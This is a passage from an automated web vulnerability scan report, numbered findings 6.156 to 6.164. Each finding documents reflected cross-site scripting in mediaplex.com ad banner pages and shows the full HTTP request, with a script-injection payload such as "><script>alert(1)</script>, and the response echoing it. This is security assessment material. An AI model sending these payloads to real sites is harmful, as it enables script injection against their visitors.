Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:55 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:56:49 GMT
ETag: "3eabf9-e85-4a04711d2ea40"
Accept-Ranges: bytes
Content-Length: 5206
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="87e10"><script>alert(1)</script>3e1f245044chttp://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]" TARGET="_blank">
...[SNIP]...

6.156. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [placementid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/revised_60days_baker_728x90.html

Issue detail

The value of the placementid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ae2"><script>alert(1)</script>5d78c060e12 was submitted in the placementid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=&placementid=1430211902829115129ae2"><script>alert(1)</script>5d78c060e12& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:59 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:56:49 GMT
ETag: "3eabf9-e85-4a04711d2ea40"
Accept-Ranges: bytes
Content-Length: 4647
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]" TARGET="_blank">
<IMG SRC
...[SNIP]...
<img src="http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_1430211902829115129ae2"><script>alert(1)</script>5d78c060e12&o=http://img.constantcontact.com/lp/images/standard/spacer.gif" height="1" width="1" alt="" style='position:absolute'>
...[SNIP]...

6.157. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21528"%3balert(1)//4a6dcee3a9a was submitted in the mpck parameter. This input was echoed as 21528";alert(1)//4a6dcee3a9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D21528"%3balert(1)//4a6dcee3a9a&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:57 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 4853
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]21528";alert(1)//4a6dcee3a9a"
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]21528";alert(1)//4a6dcee3a9a\" target=\"_blank\">
...[SNIP]...

6.158. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9396f"><script>alert(1)</script>eb778a4f1ca was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D9396f"><script>alert(1)</script>eb778a4f1ca&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:55 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 5039
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]9396f"><script>alert(1)</script>eb778a4f1ca" TARGET="_blank">
...[SNIP]...

6.159. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The value of the mpjs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f698c"><script>alert(1)</script>9debccf1805 was submitted in the mpjs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747f698c"><script>alert(1)</script>9debccf1805&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:22:19 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 4480
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]" TARGET="_blank">
<IMG SRC=
...[SNIP]...
<script type="text/javascript" src="http://ar.voicefive.com/bmx3/broker.pli?pid=p90175839&PRAd=3992125865291151&AR_C=6108747f698c"><script>alert(1)</script>9debccf1805">
...[SNIP]...

6.160. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d589e"%3balert(1)//171848c9c40 was submitted in the mpvc parameter. This input was echoed as d589e";alert(1)//171848c9c40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc=d589e"%3balert(1)//171848c9c40 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:04 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 4829
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="d589e";alert(1)//171848c9c40http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]"
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=d589e";alert(1)//171848c9c40http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&clickTag=d589e";alert(1)//171848c9c40http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHE
...[SNIP]...

6.161. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada04"><script>alert(1)</script>6bca3228bcc was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc=ada04"><script>alert(1)</script>6bca3228bcc HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:02 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 5039
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="ada04"><script>alert(1)</script>6bca3228bcchttp://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]" TARGET="_blank">
...[SNIP]...

6.162. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ec1a"%3balert(1)//6d19a03d6 was submitted in the mpck parameter. This input was echoed as 2ec1a";alert(1)//6d19a03d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D2ec1a"%3balert(1)//6d19a03d6&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 4815
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]2ec1a";alert(1)//6d19a03d6" T
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]2ec1a";alert(1)//6d19a03d6\" target=\"_blank\">
...[SNIP]...

6.163. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b254e"><script>alert(1)</script>b538c57cc25 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5Db254e"><script>alert(1)</script>b538c57cc25&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:22:02 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 5029
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]b254e"><script>alert(1)</script>b538c57cc25" TARGET="_blank">
...[SNIP]...

6.164. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The value of the mpjs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab4b"><script>alert(1)</script>182a4115eca was submitted in the mpjs parameter. This input was echoed unmodified in the application's response.

